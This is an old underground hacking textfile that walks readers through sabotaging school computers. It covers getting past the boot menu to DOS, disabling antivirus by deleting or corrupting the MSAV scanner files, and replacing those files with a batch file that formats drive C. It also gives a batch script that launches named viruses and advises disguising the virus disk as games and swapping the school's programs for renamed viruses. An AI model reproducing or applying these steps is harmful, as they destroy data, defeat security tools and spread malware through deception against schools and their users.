Disclaimer: United States Underground will have no responsibility on the actions of the readers of uSu. In no way is uSu to be in fault as a result of any actions, directly or indirectly relating to this textfile. If you cannot do this, do not read this. This file is for information purposes only. How to fuck up a School Mainframe: Courtesy of: ThE aNaRcHiSt The most unaware, stupidest, computer systems in the world have to be computers at schools, high-school and middle-school especially. The coolest way to fuck up their computers are virii. Now this little textfile will give you all the information you need to become a full-fleged HPAVCTE`er. 1. Getting into DOS There isn't one school I know of that doesn't have Direct Access on it. Which is when you boot up the computer, it doesn't go into the OS, but right to Direct Access. The School wants you to think the only way to get into DOS is to find out the exit to dos password. There are so many ways to overcome this problem. You could do Control+Alt+Delete to reset the computer, and when you see: Starting MS-DOS... Press Left-Shift many times, this should override DA5 and put you right into DOS. Another way to do it is to go into the typing program, open the file: C:\AUTOEXEC.BAT, and take out the last word which should be MENU. Save it in ASCII format and reboot the computer. The other way is to just launch the viruses from Windows--->Main---->File Manager. 2. Take all precautions. Sometimes if there has been trouble before concerning computer virii, the school may stress abit of caution. But I guarantee, if you can't overcome this caution, don't read this textfile. Some of the time, if the scool suspects something, they will do a routine virus scan on all of the files. Now, there are many ways of overcoming this little problem. First you can just delete all of the .EXE, or .COM files in the directory containing the scanner. Usually they will use the scanner that comes with dos. These files will be MSAV*.* which are all the scanning files in DOS. Others used are McAfee's SCAN, but they probably won't use it because in order to use it in school it must be registered, most schools are too cheap to register software, so you don't really have to worry about that. Instead of just deleting the files you can go into MS-DOS editor, or Qbasic to edit the .EXE's or COM's. The most creative way to fuck these up is to just type a bunch of bullshit in the file with OVR on. The other way is to copy all of the bullshit of another program such as dosshell or format to the MSAV*.* files. The funnest way though is to delete the .EXE files, make a batch file with the same name as the .EXE that contains: format c: ECHO y ECHO You're Computer is FRIED!!!! Motherfucker! This little batch file will format their main Disk Drive and you won't even need to launch viruses. 3. 3-2-1-0 Liftoff, Virus Launch! Now for the really fun stuff. Obtain as many viruses and trojans you can fit on a disk from your favorite HPAVCTE BBS. After you have all the viruses on a disk make batch file called RUN.BAT and in it put all of the .COM filez that launch the viruses, Example: kinison vmessiah pearlhbr dontello ECHO HAHAHAHAHAHAHAHAHAHAHAHAH!!!! This Batch file will launch all of your viruses and nobody will suspect anything. But just to be safe, don't be a putts and label the disk: VIRUSES THAT I WILL LAUNCH ON THE MAINFRAME or something because if someone sees that disk It'll be all over. So play it safe and label it: DOS GAMES TYPE "RUN" AT PROMPT They won't suspect a thing. 4. In Conclusion If someone happens to pickup the viruses with a scanner, there is still a way to get revenge. Find one or two disks of the school's and replace alll of the COM or EXE files with the viruses and rename the viruses to what the name of the COM or EXE wuz. This concludes my textfile on Virii and Trojans. Have Fun!! ThE aNaRcHiSt .